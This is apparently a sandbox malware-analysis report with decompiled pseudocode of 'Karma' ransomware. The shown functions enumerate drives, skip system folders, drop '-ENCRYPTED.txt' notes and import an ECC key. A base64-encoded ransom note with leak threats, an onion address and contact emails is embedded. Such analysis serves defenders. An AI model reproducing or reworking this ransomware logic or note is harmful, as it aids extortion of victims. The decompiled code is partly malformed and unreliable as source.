							_t304 =  *(_t534 + _t495 + 0x44) & 0x0000ffff;
							_t518 = _t304;
							_t49 = _t365 + 0x20; // 0x770020
							_t452 =  >  ?  *_t45 & 0x0000ffff : _t49;
							_t367 =  >  ? _t518 : _t518 + 0x20;
							_t368 = ( >  ? _t518 : _t518 + 0x20) != ( >  ?  *_t45 & 0x0000ffff : _t49);
							__eflags = ( >  ? _t518 : _t518 + 0x20) != ( >  ?  *_t45 & 0x0000ffff : _t49);
							if(( >  ? _t518 : _t518 + 0x20) != ( >  ?  *_t45 & 0x0000ffff : _t49)) {
								break;
							}
							if(_t304 == 0) {
								goto L136;
							}
							_t495 = _t495 + 2;
						}
						_t496 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t52 = _t496 + L"$recycle.bin"; // 0x240000
							_t369 =  *_t52 & 0x0000ffff;
							_t305 =  *(_t534 + _t496 + 0x44) & 0x0000ffff;
							_t519 = _t305;
							_t56 = _t369 + 0x20; // 0x240020
							_t454 =  >  ?  *_t52 & 0x0000ffff : _t56;
							_t371 =  >  ? _t519 : _t519 + 0x20;
							_t372 = ( >  ? _t519 : _t519 + 0x20) != ( >  ?  *_t52 & 0x0000ffff : _t56);
							__eflags = ( >  ? _t519 : _t519 + 0x20) != ( >  ?  *_t52 & 0x0000ffff : _t56);
							if(( >  ? _t519 : _t519 + 0x20) != ( >  ?  *_t52 & 0x0000ffff : _t56)) {
								break;
							}
							if(_t305 == 0) {
								goto L136;
							}
							_t496 = _t496 + 2;
						}
						_t497 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t59 = _t497 + L"all users"; // 0x610000
							_t373 =  *_t59 & 0x0000ffff;
							_t306 =  *(_t534 + _t497 + 0x44) & 0x0000ffff;
							_t520 = _t306;
							_t63 = _t373 + 0x20; // 0x610020
							_t456 =  >  ?  *_t59 & 0x0000ffff : _t63;
							_t375 =  >  ? _t520 : _t520 + 0x20;
							_t376 = ( >  ? _t520 : _t520 + 0x20) != ( >  ?  *_t59 & 0x0000ffff : _t63);
							__eflags = ( >  ? _t520 : _t520 + 0x20) != ( >  ?  *_t59 & 0x0000ffff : _t63);
							if(( >  ? _t520 : _t520 + 0x20) != ( >  ?  *_t59 & 0x0000ffff : _t63)) {
								break;
							}
							if(_t306 == 0) {
								goto L136;
							}
							_t497 = _t497 + 2;
						}
						_t498 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t66 = _t498 + L"default user"; // 0x640000
							_t377 =  *_t66 & 0x0000ffff;
							_t307 =  *(_t534 + _t498 + 0x44) & 0x0000ffff;
							_t521 = _t307;
							_t70 = _t377 + 0x20; // 0x640020
							_t458 =  >  ?  *_t66 & 0x0000ffff : _t70;
							_t379 =  >  ? _t521 : _t521 + 0x20;
							_t380 = ( >  ? _t521 : _t521 + 0x20) != ( >  ?  *_t66 & 0x0000ffff : _t70);
							__eflags = ( >  ? _t521 : _t521 + 0x20) != ( >  ?  *_t66 & 0x0000ffff : _t70);
							if(( >  ? _t521 : _t521 + 0x20) != ( >  ?  *_t66 & 0x0000ffff : _t70)) {
								break;
							}
							if(_t307 == 0) {
								goto L136;
							}
							_t498 = _t498 + 2;
						}
						_t499 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t73 = _t499 + L"public"; // 0x700000
							_t381 =  *_t73 & 0x0000ffff;
							_t308 =  *(_t534 + _t499 + 0x44) & 0x0000ffff;
							_t522 = _t308;
							_t77 = _t381 + 0x20; // 0x700020
							_t460 =  >  ?  *_t73 & 0x0000ffff : _t77;
							_t383 =  >  ? _t522 : _t522 + 0x20;
							_t384 = ( >  ? _t522 : _t522 + 0x20) != ( >  ?  *_t73 & 0x0000ffff : _t77);
							__eflags = ( >  ? _t522 : _t522 + 0x20) != ( >  ?  *_t73 & 0x0000ffff : _t77);
							if(( >  ? _t522 : _t522 + 0x20) != ( >  ?  *_t73 & 0x0000ffff : _t77)) {
								break;
							}
							if(_t308 == 0) {
								goto L136;
							}
							_t499 = _t499 + 2;
						}
						_t500 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t80 = _t500 + L"programdata"; // 0x700000
							_t385 =  *_t80 & 0x0000ffff;
							_t309 =  *(_t534 + _t500 + 0x44) & 0x0000ffff;
							_t523 = _t309;
							_t84 = _t385 + 0x20; // 0x700020
							_t462 =  >  ?  *_t80 & 0x0000ffff : _t84;
							_t387 =  >  ? _t523 : _t523 + 0x20;
							_t388 = ( >  ? _t523 : _t523 + 0x20) != ( >  ?  *_t80 & 0x0000ffff : _t84);
							__eflags = ( >  ? _t523 : _t523 + 0x20) != ( >  ?  *_t80 & 0x0000ffff : _t84);
							if(( >  ? _t523 : _t523 + 0x20) != ( >  ?  *_t80 & 0x0000ffff : _t84)) {
								break;
							}
							if(_t309 == 0) {
								goto L136;
							}
							_t500 = _t500 + 2;
						}
						_t501 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t87 = _t501 + L"appdata"; // 0x610000
							_t389 =  *_t87 & 0x0000ffff;
							_t310 =  *(_t534 + _t501 + 0x44) & 0x0000ffff;
							_t524 = _t310;
							_t91 = _t389 + 0x20; // 0x610020
							_t464 =  >  ?  *_t87 & 0x0000ffff : _t91;
							_t391 =  >  ? _t524 : _t524 + 0x20;
							_t392 = ( >  ? _t524 : _t524 + 0x20) != ( >  ?  *_t87 & 0x0000ffff : _t91);
							__eflags = ( >  ? _t524 : _t524 + 0x20) != ( >  ?  *_t87 & 0x0000ffff : _t91);
							if(( >  ? _t524 : _t524 + 0x20) != ( >  ?  *_t87 & 0x0000ffff : _t91)) {
								break;
							}
							if(_t310 == 0) {
								goto L136;
							}
							_t501 = _t501 + 2;
						}
						_t502 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t94 = _t502 + L"program files"; // 0x700000
							_t393 =  *_t94 & 0x0000ffff;
							_t311 =  *(_t534 + _t502 + 0x44) & 0x0000ffff;
							_t525 = _t311;
							_t98 = _t393 + 0x20; // 0x700020
							_t466 =  >  ?  *_t94 & 0x0000ffff : _t98;
							_t395 =  >  ? _t525 : _t525 + 0x20;
							_t396 = ( >  ? _t525 : _t525 + 0x20) != ( >  ?  *_t94 & 0x0000ffff : _t98);
							__eflags = ( >  ? _t525 : _t525 + 0x20) != ( >  ?  *_t94 & 0x0000ffff : _t98);
							if(( >  ? _t525 : _t525 + 0x20) != ( >  ?  *_t94 & 0x0000ffff : _t98)) {
								break;
							}
							if(_t311 == 0) {
								goto L136;
							}
							_t502 = _t502 + 2;
						}
						_t503 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t101 = _t503 + L"program files (x86)"; // 0x700000
							_t397 =  *_t101 & 0x0000ffff;
							_t312 =  *(_t534 + _t503 + 0x44) & 0x0000ffff;
							_t526 = _t312;
							_t105 = _t397 + 0x20; // 0x700020
							_t468 =  >  ?  *_t101 & 0x0000ffff : _t105;
							_t399 =  >  ? _t526 : _t526 + 0x20;
							_t400 = ( >  ? _t526 : _t526 + 0x20) != ( >  ?  *_t101 & 0x0000ffff : _t105);
							__eflags = ( >  ? _t526 : _t526 + 0x20) != ( >  ?  *_t101 & 0x0000ffff : _t105);
							if(( >  ? _t526 : _t526 + 0x20) != ( >  ?  *_t101 & 0x0000ffff : _t105)) {
								break;
							}
							if(_t312 == 0) {
								goto L136;
							}
							_t503 = _t503 + 2;
						}
						_t504 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t108 = _t504 + L"default"; // 0x640000
							_t401 =  *_t108 & 0x0000ffff;
							_t313 =  *(_t534 + _t504 + 0x44) & 0x0000ffff;
							_t527 = _t313;
							_t112 = _t401 + 0x20; // 0x640020
							_t470 =  >  ?  *_t108 & 0x0000ffff : _t112;
							_t403 =  >  ? _t527 : _t527 + 0x20;
							_t404 = ( >  ? _t527 : _t527 + 0x20) != ( >  ?  *_t108 & 0x0000ffff : _t112);
							__eflags = ( >  ? _t527 : _t527 + 0x20) != ( >  ?  *_t108 & 0x0000ffff : _t112);
							if(( >  ? _t527 : _t527 + 0x20) != ( >  ?  *_t108 & 0x0000ffff : _t112)) {
								break;
							}
							if(_t313 == 0) {
								goto L136;
							}
							_t504 = _t504 + 2;
						}
						_t505 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t115 = _t505 + L"system volume insformation"; // 0x730000
							_t405 =  *_t115 & 0x0000ffff;
							_t314 =  *(_t534 + _t505 + 0x44) & 0x0000ffff;
							_t528 = _t314;
							_t119 = _t405 + 0x20; // 0x730020
							_t472 =  >  ?  *_t115 & 0x0000ffff : _t119;
							_t407 =  >  ? _t528 : _t528 + 0x20;
							_t408 = ( >  ? _t528 : _t528 + 0x20) != ( >  ?  *_t115 & 0x0000ffff : _t119);
							__eflags = ( >  ? _t528 : _t528 + 0x20) != ( >  ?  *_t115 & 0x0000ffff : _t119);
							if(( >  ? _t528 : _t528 + 0x20) != ( >  ?  *_t115 & 0x0000ffff : _t119)) {
								break;
							}
							if(_t314 == 0) {
								goto L136;
							}
							_t505 = _t505 + 2;
						}
						_t506 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t122 = _t506 + L"searches"; // 0x730000
							_t409 =  *_t122 & 0x0000ffff;
							_t315 =  *(_t534 + _t506 + 0x44) & 0x0000ffff;
							_t529 = _t315;
							_t126 = _t409 + 0x20; // 0x730020
							_t474 =  >  ?  *_t122 & 0x0000ffff : _t126;
							_t411 =  >  ? _t529 : _t529 + 0x20;
							_t412 = ( >  ? _t529 : _t529 + 0x20) != ( >  ?  *_t122 & 0x0000ffff : _t126);
							__eflags = ( >  ? _t529 : _t529 + 0x20) != ( >  ?  *_t122 & 0x0000ffff : _t126);
							if(( >  ? _t529 : _t529 + 0x20) != ( >  ?  *_t122 & 0x0000ffff : _t126)) {
								break;
							}
							if(_t315 == 0) {
								goto L136;
							}
							_t506 = _t506 + 2;
						}
						_t485 = _v2168;
						_t414 =  &_v1564 - 2;
						_t476 = (_t485 -  &_v1564 >> 1) + 1 + (_t485 -  &_v1564 >> 1) + 1;
						asm("o16 nop [eax+eax]");
						do {
							_t279 =  *(_t476 + _t414) & 0x0000ffff;
							_t414 =  &(_t414[0]);
							 *_t414 = _t279;
						} while (_t279 != 0);
						_t415 =  &_v1564;
						_t477 =  &(_v2156.cFileName);
						asm("o16 nop [eax+eax]");
						do {
							_t280 =  *_t415 & 0x0000ffff;
							_t415 =  &(_t415[1]);
						} while (_t280 != 0);
						_t416 = _t415 - 4;
						do {
							_t281 =  *_t477 & 0x0000ffff;
							_t416 =  &(_t416[0]);
							 *_t416 = _t281;
							_t477 =  &(_t477[1]);
						} while (_t281 != 0);
						_t417 =  &_v1564;
						_t478 = "\\";
						do {
							_t282 =  *_t417 & 0x0000ffff;
							_t417 =  &(_t417[1]);
						} while (_t282 != 0);
						_t418 = _t417 - 4;
						do {
							_t283 =  *_t478 & 0x0000ffff;
							_t418 =  &(_t418[0]);
							 *_t418 = _t283;
							_t141 =  &(_t478[2]); // 0x5b0000
							_t478 = _t141;
						} while (_t283 != 0);
						E00402D30( &_v1564); // executed
						L137:
						_t301 = _v2160;
						_t246 = FindNextFileW(_t301,  &_v2156); // executed
					} while (_t246 != 0);
					_t224 = FindClose(_t301); // executed
					goto L139;
				}
				_t483 =  *0x406008;
				_t424 = 0;
				_v2160 = 0;
				if( *_t483 == 0) {
					L19:
					WriteFile(_t508, _t483, _t424,  &_v2160, 0); // executed
					FindCloseChangeNotification(_t508); // executed
					goto L20;
				} else {
					goto L18;
				}
				do {
					L18:
					_t424 = _t424 + 1;
				} while ( *((char*)(_t483 + _t424)) != 0);
				goto L19;
			}

APIs
  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000,?,00000000), ref: 00402E48
  • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402E79
  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402E80
  • FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 00402E93
  • FindNextFileW.KERNELBASE(?,00000010), ref: 0040357D
  • FindClose.KERNELBASE(?), ref: 0040358C
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: FileFind$Close$ChangeCreateFirstNextNotificationWrite
  • String ID: (B@$*.*$-ENCRYPTED.txt$KARMA$[+] File:
  • API String ID: 2220306862-2596288547
  • Opcode ID: 8a938890bff21654b03310ee6eca8aec884135f065448ed88dc19506c41084db
  • Instruction ID: 75b7a5a78fe1073b3c6088b204df1b69f2768af81c19e24722ade746e019dbe6
  • Opcode Fuzzy Hash: 8a938890bff21654b03310ee6eca8aec884135f065448ed88dc19506c41084db
  • Instruction Fuzzy Hash: 69322631604212CBC728DF24C0945BAB3F5FFA4749B58467ED8DAAB1C0FB35DA09C689
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 313 4035d0-4035dd 314 4035e0-403614 GetDriveTypeW GetProcessHeap HeapAlloc 313->314 315 403620-403662 CreateThread Sleep 314->315 316 403616-403619 314->316 318 403663-403667 315->318 316->315 317 40361b-40361e 316->317 317->315 317->318 318->314 319 40366d-403671 318->319 320 403673-403679 319->320 321 40368d-403693 319->321 322 403680-40368b WaitForSingleObject 320->322 322->321 322->322
C-Code - Quality: 100%
			E004035D0() {
				signed short _v6;
				signed short _v8;
				signed short _v10;
				short _v12;
				int _t22;
				void* _t24;
				void* _t25;
				void* _t32;
				signed int _t33;
				void* _t34;
				signed int _t36;
				void* _t37;

				_t36 = 0;
				_t25 = 0;
				do {
					_t1 = _t25 + 0x41; // 0x41
					_v10 = 0x5c003a;
					_v12 = _t1;
					_v6 = 0;
					_t22 = GetDriveTypeW( &_v12); // executed
					_t24 = HeapAlloc(GetProcessHeap(), 0, 4);
					_t32 = _t22 - 2;
					if(_t32 == 0) {
						L4:
						 *_t24 = _v12 & 0x0000ffff;
						 *((short*)(_t24 + 2)) = _v10 & 0x0000ffff;
						 *((short*)(_t24 + 4)) = _v8 & 0x0000ffff;
						 *((short*)(_t24 + 6)) = _v6 & 0x0000ffff;
						_t24 = CreateThread(0, 0, E004035A0, _t24, 0, 0); // executed
						 *(_t37 + _t36 * 4 - 0x70) = _t24;
						Sleep(0x1f4); // executed
						_t36 = _t36 + 1;
					} else {
						_t34 = _t32 - 1;
						if(_t34 == 0 || _t34 == 1) {
							goto L4;
						}
					}
					_t25 = _t25 + 1;
				} while (_t25 < 0x1a);
				_t33 = 0;
				if(_t36 > 0) {
					do {
						_t24 = WaitForSingleObject( *(_t37 + _t33 * 4 - 0x70), 0xffffffff);
						_t33 = _t33 + 1;
					} while (_t33 < _t36);
				}
				return _t24;
			}

APIs
  • GetDriveTypeW.KERNELBASE(00401CE0,?,00000000), ref: 004035F8
  • GetProcessHeap.KERNEL32(00000000,00000004,?,00000000), ref: 00403604
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040360B
  • CreateThread.KERNELBASE(00000000,00000000,004035A0,00000000,00000000,00000000), ref: 0040364D
  • Sleep.KERNELBASE(000001F4,?,00000000), ref: 0040365C
  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00403686
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: Heap$AllocCreateDriveObjectProcessSingleSleepThreadTypeWait
  • String ID: :
  • API String ID: 1194941407-336475711
  • Opcode ID: b68e62db0e7d7ff1e76393a804ae40f3a4cccfeb63e304d6252fe6c83f6df8c1
  • Instruction ID: f9a26f22717e4b865f86f0128e4220b313bc1228d00de3c61ba25951b82e18bc
  • Opcode Fuzzy Hash: b68e62db0e7d7ff1e76393a804ae40f3a4cccfeb63e304d6252fe6c83f6df8c1
  • Instruction Fuzzy Hash: E921A572A40218BEC7109FF49D49B6E7B78FF85702F025566E705BB2E0D6794505C358
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 77 401df0-401e12 78 401e15-401e22 77->78 78->78 79 401e24-401e2f 78->79 80 401e30-401e39 79->80 80->80 81 401e3b-401e3f 80->81 82 401e40-401e4f 81->82 82->82 83 401e51-401e5a 82->83 84 401e6c-401e9e GetStdHandle WriteConsoleW 83->84 85 401e5c 83->85 87 401ea0-401ea7 LoadLibraryA 84->87 88 401eac-401eba 84->88 86 401e60-401e6a 85->86 86->84 86->86 87->88 89 401ecc-401ed5 88->89 90 401ebc-401ec6 GetProcAddress 88->90 91 401ed7 89->91 92 401eec-401f22 GetProcessHeap HeapAlloc 89->92 90->89 93 401ee0-401eea 91->93 95 401f33-401f3a 92->95 96 401f24-401f2d LoadLibraryA 92->96 93->92 93->93 97 401f49-401f52 95->97 98 401f3c-401f44 GetProcAddress 95->98 96->95 99 401f60-401f7a 97->99 100 401f54-401f5e 97->100 98->97 102 401f88-401f90 99->102 103 401f7c-401f83 LoadLibraryA 99->103 100->99 100->100 104 401fa2-401fab 102->104 105 401f92-401f9c GetProcAddress 102->105 103->102 106 401fbc-401ff4 GetProcessHeap HeapAlloc 104->106 107 401fad 104->107 105->104 110 402005-40200c 106->110 111 401ff6-401fff LoadLibraryA 106->111 108 401fb0-401fba 107->108 108->106 108->108 112 40201b-402024 110->112 113 40200e-402016 GetProcAddress 110->113 111->110 114 402026 112->114 115 40203c-402061 112->115 113->112 116 402030-40203a 114->116 116->115 116->116
C-Code - Quality: 69%
			E00401DF0() {
				long _v8;
				void _v528;
				signed int _t35;
				signed int _t36;
				signed int _t37;
				long _t38;
				struct HINSTANCE__* _t42;
				void* _t46;
				_Unknown_base(*)()* _t47;
				struct HINSTANCE__* _t49;
				void* _t55;
				_Unknown_base(*)()* _t56;
				void* _t58;
				void* _t64;
				void* _t65;
				signed int* _t68;
				signed short* _t69;
				signed int* _t70;
				signed int _t71;
				struct HINSTANCE__* _t72;
				signed int _t73;
				signed int _t74;
				struct HINSTANCE__* _t75;
				signed int _t76;
				void* _t79;
				signed short* _t80;
				_Unknown_base(*)()* _t81;
				_Unknown_base(*)()* _t83;
				void* _t91;
				void* _t103;
				void* _t107;
				void* _t111;
				void* _t115;

				_t68 =  &_v528 - 2;
				_t79 = (L"[+] Trying to import ECC public key..." -  &_v528 >> 1) + 1 + (L"[+] Trying to import ECC public key..." -  &_v528 >> 1) + 1;
				do {
					_t35 =  *(_t79 + _t68) & 0x0000ffff;
					_t68 =  &(_t68[0]);
					 *_t68 = _t35;
				} while (_t35 != 0);
				_t69 =  &_v528;
				_t80 = "\n";
				do {
					_t36 =  *_t69 & 0x0000ffff;
					_t69 =  &(_t69[1]);
				} while (_t36 != 0);
				_t70 = _t69 - 4;
				do {
					_t37 =  *_t80 & 0x0000ffff;
					_t70 =  &(_t70[0]);
					 *_t70 = _t37;
					_t8 =  &(_t80[1]); // 0x414b0000
					_t80 = _t8;
				} while (_t37 != 0);
				_t38 = 0;
				if(_v528 != 0) {
					do {
						_t38 = _t38 + 1;
					} while ( *((short*)(_t91 + _t38 * 2 - 0x20c)) != 0);
				}
				WriteConsoleW(GetStdHandle(0xfffffff5),  &_v528, _t38, 0, 0); // executed
				_t42 =  *0x406018;
				_v8 = 0;
				if(_t42 == 0) {
					_t42 = LoadLibraryA("crypt32.dll"); // executed
					 *0x406018 = _t42;
				}
				_t81 =  *0x406010;
				if(_t81 == 0) {
					_t81 = GetProcAddress(_t42, "CryptStringToBinaryW");
					 *0x406010 = _t81;
				}
				_t71 = 0;
				_t103 = L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" - _t71; // 0x33
				if(_t103 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t71 = _t71 + 1;
					} while ( *((short*)(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" + _t71 * 2)) != 0);
				}
				 *_t81(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==", _t71, 1, 0,  &_v8, 0, 0);
				_t46 = HeapAlloc(GetProcessHeap(), 0, _v8);
				_t72 =  *0x406018;
				_t64 = _t46;
				 *0x406004 = _t64;
				if(_t72 == 0) {
					_t72 = LoadLibraryA("crypt32.dll");
					 *0x406018 = _t72;
				}
				_t47 =  *0x406010;
				if(_t47 == 0) {
					_t47 = GetProcAddress(_t72, "CryptStringToBinaryW");
					 *0x406010 = _t47;
				}
				_t73 = 0;
				_t107 = L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" - _t73; // 0x33
				if(_t107 != 0) {
					do {
						_t73 = _t73 + 1;
					} while ( *((short*)(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" + _t73 * 2)) != 0);
				}
				 *_t47(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==", _t73, 1, _t64,  &_v8, 0, 0);
				_t49 =  *0x406018;
				if(_t49 == 0) {
					_t49 = LoadLibraryA("crypt32.dll");
					 *0x406018 = _t49;
				}
				_t83 =  *0x406010;
				if(_t83 == 0) {
					_t83 = GetProcAddress(_t49, "CryptStringToBinaryW");
					 *0x406010 = _t83;
				}
				_t74 = 0;
				_t111 = L"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" - _t74; // 0x57
				if(_t111 != 0) {
					do {
						_t74 = _t74 + 1;
					} while ( *((short*)(L"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" + _t74 * 2)) != 0);
				}
				 *_t83(L"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", _t74, 1, 0,  &_v8, 0, 0);
				_t55 = HeapAlloc(GetProcessHeap(), 0, _v8 + 1);
				_t75 =  *0x406018;
				_t65 = _t55;
				 *0x406008 = _t65;
				if(_t75 == 0) {
					_t75 = LoadLibraryA("crypt32.dll");
					 *0x406018 = _t75;
				}
				_t56 =  *0x406010;
				if(_t56 == 0) {
					_t56 = GetProcAddress(_t75, "CryptStringToBinaryW");
					 *0x406010 = _t56;
				}
				_t76 = 0;
				_t115 = L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZiB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g" - _t76; // 0x57
				if(_t115 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t76 = _t76 + 1;
					} while ( *((short*)(L"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" + _t76 * 2)) != 0);
				}
				 *_t56(L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZiB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g", _t76, 1, _t65,  &_v8, 0, 0);
				_t58 =  *0x406008;
				 *((char*)(_t58 + _v8)) = 0;
				return _t58;
			}

APIs
  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000,?,00000000), ref: 00401E7D
